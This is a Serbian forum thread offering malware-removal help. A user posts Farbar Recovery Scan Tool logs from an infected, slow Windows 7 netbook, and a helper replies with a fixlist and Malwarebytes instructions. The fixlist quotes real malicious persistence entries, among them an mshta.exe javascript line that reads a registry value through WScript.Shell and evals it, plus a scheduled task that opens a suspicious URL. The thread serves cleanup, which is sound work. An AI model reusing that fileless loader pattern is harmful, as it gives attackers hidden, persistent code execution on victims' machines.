Asus Eee PC 1001PX vise problema

1

Asus Eee PC 1001PX vise problema

offline
  • Pridružio: 26 Mar 2011
  • Poruke: 221

Postovani imam vise problema.
Koristim windows 7 home 32 bit,sam note book je jako spor sto u pocetku nije bio slucaj ,evo i sada dok pisem cekam po par sekundi da otkucam rec,dalje okacicu prt Sc imam nekoliko programa koje ne mogu da deinstaliram jer kada odem u control panel u deinstalaciju programa tamo ih nema,jako spor rad mozzile,po nekada mi pri samom ukljucenju notebooka izbaci neku poruku ali toliko brzo nestane da ne uspem da procitam sta je,po nekad je zvuk dobar nekada los...generalno moj problem je jako jako spor rad samog notebooka,molim za pomoc osvezavanje sistema ili sta vec,hvala unapred.



evo i frst logova po upustvu sa pocetka ovog dela foruma.
https://www.mycity.rs/must-login.png

https://www.mycity.rs/must-login.png
hvala unapred.


Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 23-04-2017 01
Ran by ASUS (administrator) on ASUS-PC (25-04-2017 19:33:33)
Running from C:\Users\ASUS\Desktop
Loaded Profiles: ASUS (Available Profiles: ASUS)
Platform: Microsoft Windows 7 Home Premium Service Pack 1 (X86) Language: English (United States)
Internet Explorer Version 8 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-t.....scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Teruten) C:\Windows\System32\FsUsbExService.Exe
() C:\ProgramData\DatacardService\HWDeviceService.exe
(Huawei Technologies Co., Ltd.) C:\ProgramData\DatacardService\DCSHelper.exe
() C:\ProgramData\mts mobilni internet\OnlineUpdate\ouc.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\Version9\TeamViewer_Service.exe
(Google Inc.) C:\Program Files\Google\Update\1.3.33.3\GoogleCrashHandler.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

Winlogon\Notify\atxitam: C:\Users\ASUS\AppData\Local\atxitam.dll [2017-04-19] ()
HKU\S-1-5-21-1739059202-3565848293-805263540-1000\...\Run: [*qeourepp<*>] => "C:\Users\ASUS\AppData\Local\4214\6037.bat" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1739059202-3565848293-805263540-1000\...\MountPoints2: {7c3ddaa8-4a9f-11e5-b743-bcaec51997ab} - E:\Startme.exe
HKU\S-1-5-21-1739059202-3565848293-805263540-1000\...\MountPoints2: {f414bcae-d9e4-11e4-8ed9-bcaec51997ab} - E:\AutoRun.exe
HKU\S-1-5-21-1739059202-3565848293-805263540-1000\...409d6c4515e9\InprocServer32: [Default-shell32] C:\Users\ASUS\AppData\Local\YmtpPack\drmdugbj.dll ATTENTION
ShellIconOverlayIdentifiers: [0TheftProtectionDll] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} => C:\ProgramData\Microsoft\Performance\TheftProtection\TheftProtection.dll [2017-04-14] ()
GroupPolicy: Restriction ? <======= ATTENTION
GroupPolicy\User: Restriction ? <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 89.216.1.30 89.216.1.50
Tcpip\..\Interfaces\{0AAFBB01-C496-474D-8BC2-940C0A776BD8}: [NameServer] 172.21.21.158 172.21.21.157
Tcpip\..\Interfaces\{578AA652-166E-433B-86EA-9467752D23F8}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{5DAACF19-081A-4322-9054-F1578CC1D2BD}: [DhcpNameServer] 89.216.1.30 89.216.1.50
Tcpip\..\Interfaces\{724FAD3D-C7A8-435F-B037-9FF54294D378}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{F503BD61-4609-4AE6-8B95-4C67A8ABD4A1}: [DhcpNameServer] 192.168.42.129

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com
HKU\S-1-5-21-1739059202-3565848293-805263540-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://mail.ru/cnt/10445?gp=811040
HKU\S-1-5-21-1739059202-3565848293-805263540-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp
SearchScopes: HKU\S-1-5-21-1739059202-3565848293-805263540-1000 -> DefaultScope {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxp://go.mail.ru/distib/ep/?q={SearchTerms}&product_id=%7BD8F6AC8F-AB1B-4883-859B-DCE6FC23CC1A%7D&gp=811041
SearchScopes: HKU\S-1-5-21-1739059202-3565848293-805263540-1000 -> {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxp://go.mail.ru/distib/ep/?q={SearchTerms}&product_id=%7BD8F6AC8F-AB1B-4883-859B-DCE6FC23CC1A%7D&gp=811041
BHO: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.150\McAfeeMSS_IE.dll [2014-04-09] (McAfee, Inc.)
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2014-04-25] (Microsoft Corporation)
BHO: Ďîčńę@Mail.Ru -> {8E8F97CD-60B5-456F-A201-73065652D099} -> C:\Users\ASUS\AppData\Local\Mail.Ru\Sputnik\IESearchPlugin.dll [2017-04-21] (Mail.Ru)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2014-01-23] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2014-04-08] (Microsoft Corporation)
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2014-04-01] (Microsoft Corporation)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\ASUS\AppData\Roaming\Mozilla\Firefox\Profiles\ij5a11r8.default [2017-04-25]
FF NewTab: Mozilla\Firefox\Profiles\ij5a11r8.default -> about:newtab
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\ij5a11r8.default -> Поиск@Mail.Ru
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\ij5a11r8.default -> Поиск@Mail.Ru
FF Homepage: Mozilla\Firefox\Profiles\ij5a11r8.default -> hxxps://www.google.rs/
FF Keyword.URL: Mozilla\Firefox\Profiles\ij5a11r8.default -> hxxp://go.mail.ru/distib/ep/?product_id=%7B6FED2366-7EC4-400F-AC64-DB273A71E665%7D&gp=811037
FF SearchPlugin: C:\Users\ASUS\AppData\Roaming\Mozilla\Firefox\Profiles\ij5a11r8.default\searchplugins\mailru.xml [2017-04-21]
FF Extension: (Skype) - C:\Program Files\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2016-01-06]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_25_0_0_148.dll [2017-04-14] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2014-01-23] (Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~2\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.33.3\npGoogleUpdate3.dll [2017-04-14] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.33.3\npGoogleUpdate3.dll [2017-04-14] (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2017-03-28] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1739059202-3565848293-805263540-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\ASUS\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2016-05-08] (Unity Technologies ApS)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2014-01-23] (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll [2017-03-28] (Adobe Systems Inc.)

Chrome:
=======
CHR HomePage: Default -> hxxps://mail.ru/cnt/11956636?rciguc__PARAM__
CHR StartupUrls: Default -> "hxxp://mail.ru/cnt/10445?gp=811040"
CHR NewTab: Default -> "chrome-extension://oelpkepjlgmehajehfeicfbjdiobdkfj/visual-bookmarks.html"

CHR DefaultSearchURL: Default -> hxxp://go.mail.ru/distib/ep/?q={searchTerms}&product_id=%7B43A7E749-EF1D-4494-A885-6758E5B4AA85%7D&gp=811041
CHR DefaultSearchKeyword: Default -> mail.ru
CHR DefaultSuggestURL: Default -> hxxp://suggests.go.mail.ru/ff3?q={searchTerms}
CHR Profile: C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default [2017-04-21]
CHR Extension: (Docs) - C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-03-07]
CHR Extension: (No Name) - C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-03-07]
CHR Extension: (No Name) - C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-03-07]
CHR Extension: (Домашняя страница Mail.Ru) - C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default\Extensions\ccfifbojenkenpkmnbnndeadpfdiffof [2017-04-21]
CHR Extension: (No Name) - C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-03-07]
CHR Extension: (No Name) - C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-12-04]
CHR Extension: (Визуальные Закладки Mail.Ru) - C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default\Extensions\oelpkepjlgmehajehfeicfbjdiobdkfj [2017-04-21]
CHR Extension: (Mail.Ru) - C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default\Extensions\ojlcebdkbpjdpiligkdbbkdkfjmchbfd [2017-04-21]
CHR Extension: (No Name) - C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-03-07]
CHR HKLM\...\Chrome\Extension: [bknbnapaddjdnbilpmlacdkjdkjmbjhd] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [ccfifbojenkenpkmnbnndeadpfdiffof] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [oelpkepjlgmehajehfeicfbjdiobdkfj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [ojlcebdkbpjdpiligkdbbkdkfjmchbfd] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1739059202-3565848293-805263540-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bknbnapaddjdnbilpmlacdkjdkjmbjhd] - hxxp://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 c2cautoupdatesvc; C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2016-01-08] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2016-01-08] (Microsoft Corporation)
S3 Disc Soft Bus Service; C:\Program Files\DAEMON Tools Ultra\DiscSoftBusService.exe [813328 2014-04-28] (Disc Soft Ltd)
R2 HWDeviceService.exe; C:\ProgramData\DatacardService\HWDeviceService.exe [276048 2013-02-06] ()
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe [235696 2014-04-09] (McAfee, Inc.)
S2 mts mobilni internet. RunOuc; C:\Program Files\mts mobilni internet\UpdateDog\ouc.exe [656976 2013-05-21] ()
S3 Sony PC Companion; C:\Program Files\Sony\Sony PC Companion\PCCService.exe [155520 2015-06-10] (Avanquest Software)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2009-07-14] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 andnetadb; C:\Windows\System32\Drivers\lgandnetadb.sys [25856 2014-05-27] (Google Inc)
S3 AndnetBus; C:\Windows\System32\DRIVERS\lgandnetbus.sys [15744 2014-05-27] (LG Electronics Inc.)
S3 AndNetDiag; C:\Windows\System32\DRIVERS\lgandnetdiag.sys [23168 2014-05-27] (LG Electronics Inc.)
S3 ANDNetModem; C:\Windows\System32\DRIVERS\lgandnetmodem.sys [27776 2014-05-27] (LG Electronics Inc.)
S3 andnetndis; C:\Windows\System32\DRIVERS\lgandnetndis.sys [74240 2014-05-27] (LG Electronics Inc.)
R3 dtscsibus; C:\Windows\System32\DRIVERS\dtscsibus.sys [24704 2014-05-24] (Disc Soft Ltd)
R3 FsUsbExDisk; C:\Windows\system32\FsUsbExDisk.SYS [36608 2010-06-14] () [File not signed]
S3 ggsomc; C:\Windows\System32\DRIVERS\ggsomc.sys [26328 2015-08-24] (Sony Mobile Communications)
S3 huawei_cdcacm; C:\Windows\System32\DRIVERS\ew_jucdcacm.sys [101248 2013-03-04] (Huawei Technologies Co., Ltd.)
S3 huawei_ext_ctrl; C:\Windows\System32\DRIVERS\ew_juextctrl.sys [27776 2013-03-04] (Huawei Technologies Co., Ltd.)
S3 huawei_wwanecm; C:\Windows\System32\DRIVERS\ew_juwwanecm.sys [208384 2013-06-29] (Huawei Technologies Co., Ltd.)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-04-25 19:33 - 2017-04-25 19:34 - 00013400 _____ C:\Users\ASUS\Desktop\FRST.txt
2017-04-25 19:33 - 2017-04-25 19:33 - 01767936 _____ (Farbar) C:\Users\ASUS\Desktop\FRST.exe
2017-04-25 19:33 - 2017-04-25 19:33 - 00000000 ____D C:\FRST
2017-04-21 12:05 - 2017-04-21 12:24 - 00000000 ____D C:\Program Files\Mail.Ru
2017-04-21 12:05 - 2017-04-21 12:05 - 00000000 ____D C:\Users\ASUS\AppData\LocalLow\Unity
2017-04-21 12:00 - 2017-04-21 12:23 - 00000000 ____D C:\Users\ASUS\AppData\Local\Mail.Ru
2017-04-21 12:00 - 2017-04-21 12:00 - 00000000 ____D C:\ProgramData\Mail.Ru
2017-04-19 10:02 - 2017-04-19 10:02 - 00089088 _____ C:\Users\ASUS\AppData\Local\atxitam.dll
2017-04-14 21:04 - 2017-04-14 21:04 - 00000000 ____D C:\Users\ASUS\AppData\Local\4214
2017-04-14 20:49 - 2017-04-19 09:53 - 00000000 ____D C:\Users\ASUS\AppData\Local\Omdwics
2017-04-14 20:49 - 2017-04-14 20:50 - 00000000 ____D C:\Users\ASUS\AppData\Local\YmtpPack
2017-04-14 20:47 - 2017-04-14 20:55 - 00000000 ___HD C:\Users\ASUS\AppData\Local\SysHashTable
2017-04-03 20:23 - 2017-04-25 19:23 - 00000000 ____D C:\Users\ASUS\AppData\LocalLow\Mozilla
2017-04-03 20:12 - 2017-04-21 11:52 - 00000000 ____D C:\Program Files\Mozilla Firefox

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-04-25 19:28 - 2010-11-20 23:01 - 00778150 _____ C:\Windows\system32\PerfStringBackup.INI
2017-04-25 19:28 - 2009-07-14 04:37 - 00000000 ____D C:\Windows\inf
2017-04-25 19:22 - 2009-07-14 06:53 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-04-25 08:12 - 2009-07-14 06:34 - 00021072 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-04-25 08:12 - 2009-07-14 06:34 - 00021072 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-04-22 20:26 - 2014-05-22 21:42 - 00000000 ____D C:\Program Files\Mozilla Maintenance Service
2017-04-21 12:44 - 2014-05-24 15:07 - 00000000 ____D C:\Windows\system32\Macromed
2017-04-21 12:43 - 2014-05-22 23:13 - 00000000 ____D C:\Users\ASUS\AppData\Roaming\uTorrent
2017-04-21 12:26 - 2015-03-07 21:23 - 00000000 ____D C:\Program Files\Google
2017-04-21 12:00 - 2009-07-14 04:37 - 00000000 ___HD C:\Windows\system32\GroupPolicy
2017-04-21 11:52 - 2015-12-24 11:42 - 00001105 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2017-04-21 11:52 - 2014-05-22 21:42 - 00001117 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2017-04-21 11:35 - 2014-06-29 13:07 - 00000000 ____D C:\Windows\Minidump
2017-04-21 11:35 - 2014-05-24 16:10 - 00000000 ____D C:\Program Files\CCleaner
2017-04-15 14:18 - 2015-01-07 13:42 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk
2017-04-14 18:10 - 2014-05-24 15:07 - 00802904 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2017-04-14 18:10 - 2014-05-24 15:07 - 00144472 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2017-04-08 20:45 - 2015-03-07 21:24 - 00002143 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk

==================== Files in the root of some directories =======

2017-04-19 10:02 - 2017-04-19 10:02 - 0089088 _____ () C:\Users\ASUS\AppData\Local\atxitam.dll
2016-02-03 10:16 - 2016-02-03 10:16 - 0963707 _____ () C:\Users\ASUS\AppData\Local\MP4-Player_242.rar
2015-01-13 14:01 - 2015-01-13 14:01 - 0001025 _____ () C:\Users\ASUS\AppData\Local\recently-used.xbel

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => MD5 is legit
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2017-02-14 21:59

==================== End of FRST.txt ============================

offline
  • Pridružio: 26 Avg 2010
  • Poruke: 10621
  • Gde živiš: Hypnos Control Room, Tokyo Metropolitan Government Building

Arrow Korak 1

Deinstaliraj TeamViewer. Nemaš ni AV program instaliran, ali otom potom.



Arrow Korak 2

Otvori Notepad i iskopiraj sljedeći tekst koji se nalazi unutar Kod polja.

Winlogon\Notify\atxitam: C:\Users\ASUS\AppData\Local\atxitam.dll [2017-04-19] ()
HKU\S-1-5-21-1739059202-3565848293-805263540-1000\...\Run: [*qeourepp<*>] => "C:\Users\ASUS\AppData\Local\4214\6037.bat" <===== ATTENTION (Value Name with invalid characters)
ShellIconOverlayIdentifiers: [0TheftProtectionDll] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} => C:\ProgramData\Microsoft\Performance\TheftProtection\TheftProtection.dll [2017-04-14] ()
GroupPolicy: Restriction ? <======= ATTENTION
GroupPolicy\User: Restriction ? <======= ATTENTION
CHR HKLM\...\Chrome\Extension: [bknbnapaddjdnbilpmlacdkjdkjmbjhd] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [ccfifbojenkenpkmnbnndeadpfdiffof] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [oelpkepjlgmehajehfeicfbjdiobdkfj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [ojlcebdkbpjdpiligkdbbkdkfjmchbfd] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-1739059202-3565848293-805263540-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bknbnapaddjdnbilpmlacdkjdkjmbjhd] - hxxp://clients2.google.com/service/update2/crx
2017-04-19 10:02 - 2017-04-19 10:02 - 00089088 _____ C:\Users\ASUS\AppData\Local\atxitam.dll
2017-04-14 21:04 - 2017-04-14 21:04 - 00000000 ____D C:\Users\ASUS\AppData\Local\4214
2017-04-14 20:49 - 2017-04-19 09:53 - 00000000 ____D C:\Users\ASUS\AppData\Local\Omdwics
2017-04-14 20:49 - 2017-04-14 20:50 - 00000000 ____D C:\Users\ASUS\AppData\Local\YmtpPack
Task: {2829448F-86A3-4D9C-A282-7CEFB31780C2} - System32\Tasks\notbadnewsorgmorf => Firefox.exe notbadnews.org/morf <==== ATTENTION
HKU\S-1-5-21-1739059202-3565848293-805263540-1000\Software\Classes\2c8a: "C:\Windows\system32\mshta.exe" "javascript:FN2Hz1="FaY";kG00=new ActiveXObject("WScript.Shell");C9YpI5="NX5";Y03jKK=kG00.RegRead("HKCU\\software\\nshf\\prmfetrm");yzd3g="VNBdNUPl";eval(Y03jKK);V4uuh6U="n9RbwZ";" <===== ATTENTION
C:\ProgramData\Microsoft\Performance\TheftProtection


U okviru Notepad-a klikni na File --> Save As
Pod Encoding izaberi UTF-8.
Fajl nazovi Fixlist i sačuvaj na Desktop
Dvoklikom ponovo pokreni FRST.exe
Klikni na Fix i sačekaj dok program ne završi.
Ukoliko program zatraži restart računara, omogući mu da to nesmetano obavi.
Nakon završetka rada, otvoriće se fixlog.txt, sa sadržajem koji treba da kopiraš u temu.
Takođe, na Desktop-u će se nalaziti (fixlog.txt).

offline
  • Pridružio: 26 Mar 2011
  • Poruke: 221

Napisano: 26 Apr 2017 8:40

https://www.mycity.rs/must-login.png
Izvoli,a kako da deinstaliram teamViwer kada ga nemam u uninstal programs,hvala.

Dopuna: 26 Apr 2017 8:45

I jos par programa imam instalirano u sistem ali nigde ne vidim opciju gde i kako da ih deinstaliram,nema ih u uninstal programas,nem ih preko revo uninstaler progrma...

Dopuna: 26 Apr 2017 8:52

Postovanje,za teamvewer uspeo sam tako sto sam usao u c /program files i nasao folder teamvewer usao nasao uninstal i obrisao ga,posle toga ostali su neki repovi koje sam rucno izbrisao,vidim imam i neki McAfee kao anti virus ali njega nisam uspeo da obrisem na taj nacin.

offline
  • Pridružio: 26 Avg 2010
  • Poruke: 10621
  • Gde živiš: Hypnos Control Room, Tokyo Metropolitan Government Building

Arrow Korak 1

Spakuj u ZIP, RAR ili 7Z arhivu sljedeći folder:

C:\FRST\Quarantine

i pošalji ga preko sljedećeg linka:

http://www.mycity.rs/ambulanta-upload.php


Ako je arhiva koju si krerirao veća od 10MiB preskoči ovaj dio.




Arrow Korak 2

Preuzmi Malwarebytes Anti-Malware sa ovog ili ovog ili ovog linka i instaliraj aplikaciju.
Pokreni mb3-setup-consumer-{verzija}.exe i isprati uputstva za instalaciju programa. Nakon instalacije, klikni na Finish

Prilikom prvog pokretanja, program će prikazati prozor "dobrodošlice". Slobodno zatvori taj prozor.
Napomena: Premium funkcije programa su već aktivirane i važe 13 dana od trenutka instalacije. Premium funkcije možeš isključiti preko Settings > My Account tab podešavanja.

• Podešavanja skenera - u Settings, klikni na Protection tab. Ispod Scan Options sekcije, uključi "Scan for rootkits" opciju.
• Pripremi podešavanja za Threat Scan - u Dashboard , klikni na Scan Now dugme. MBAM će ažurirati bazu i započeti skeniranje.

Kada se skeniranje završi, ako je infekcija detektovana, obrati pažnju da je sve označeno, pa klikni na Remove Selected. Restartuj računar ako program upita za restart.
• Dostavi log: Pod Reports izaberi trenutni datum izveštaja Scan Report i potom klikni na View Report.

Izvezi log na Desktop;
- Klikni na Export dugme na dnu, pa onda izaberi 'Text file (*.txt)'
# U Save File dijalogu koji se pojavi, klikni na Desktop. U File name: polje, upiši "mbam" (bez navodnika) i klikni na Save.
- Pojaviće se poruka "Your file has been successfully exported", klikni Ok i zatvori prozor.



• U odgovoru prikači mbam.txt log koristeći "Prikači fajl" opciju.

offline
  • Pridružio: 26 Mar 2011
  • Poruke: 221

Napisano: 26 Apr 2017 14:40

Hvala,evo prvog dela,poslao sam po upustvu,ostatak veceras jer zurim na posao a ovo skeniranje jos uvek traje,za sada imam 16 virusa trojanaca...
Vas fajl je uspesno uploadovan.
Molimo Vas da u temi u kojoj je od Vas zahtevano da uploadujete fajl, obavestite lice koje Vam pomaze da ste to uspesno uradili.
Hvala Vam.

Dopuna: 26 Apr 2017 15:11

Nasao je nekih 588 inficiranih delova,ali nigde nisam nasao remove selected,vec quarantine selected,to sam odradio,sam se restartovao ali nije podigao sistem,pa sam opet rucno radio restart,program Malwarebytes jedva sam pokrenuo,dakle trebalo mu je nekih 5 min ,kada sam otisao u reports,za datum i viewe reports nema nista,ponovicu opet ceo postupak

Dopuna: 26 Apr 2017 23:59

https://www.mycity.rs/must-login.png
Napomenuo bih da notebook tek sada koci jos vise,jedva je otvorio i mozilu,i forum ...

offline
  • Pridružio: 26 Avg 2010
  • Poruke: 10621
  • Gde živiš: Hypnos Control Room, Tokyo Metropolitan Government Building

Daj mi nove FRST izvještaje.

offline
  • Pridružio: 26 Mar 2011
  • Poruke: 221

Izvoli,napomenuo bih opet,i dalje jako jako sporo otvaranje stranice kada pokrenem mozzilu,npr evo ucitavanje ove stranice trajalo je minut ipo,i dok ne ucita sve ne da mi da napisem text,ono npr krenem da kucam poruku otkuca tri slova i blokira.
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 26-04-2017
Ran by ASUS (administrator) on ASUS-PC (28-04-2017 09:25:56)
Running from C:\Users\ASUS\Desktop
Loaded Profiles: ASUS (Available Profiles: ASUS)
Platform: Microsoft Windows 7 Home Premium Service Pack 1 (X86) Language: English (United States)
Internet Explorer Version 8 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-t.....scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Microsoft Corporation) C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Teruten) C:\Windows\System32\FsUsbExService.Exe
() C:\ProgramData\DatacardService\HWDeviceService.exe
(Huawei Technologies Co., Ltd.) C:\ProgramData\DatacardService\DCSHelper.exe
() C:\ProgramData\mts mobilni internet\OnlineUpdate\ouc.exe
(Skype Technologies) C:\Program Files\Skype\Updater\Updater.exe
(Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Google Inc.) C:\Program Files\Google\Update\1.3.33.4\GoogleCrashHandler.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Malwarebytes TrayApp] => C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbamtray.exe [2780112 2017-01-20] (Malwarebytes)
HKU\S-1-5-21-1739059202-3565848293-805263540-1000\...\MountPoints2: {7c3ddaa8-4a9f-11e5-b743-bcaec51997ab} - E:\Startme.exe
HKU\S-1-5-21-1739059202-3565848293-805263540-1000\...\MountPoints2: {f414bcae-d9e4-11e4-8ed9-bcaec51997ab} - E:\AutoRun.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 89.216.1.30 89.216.1.50
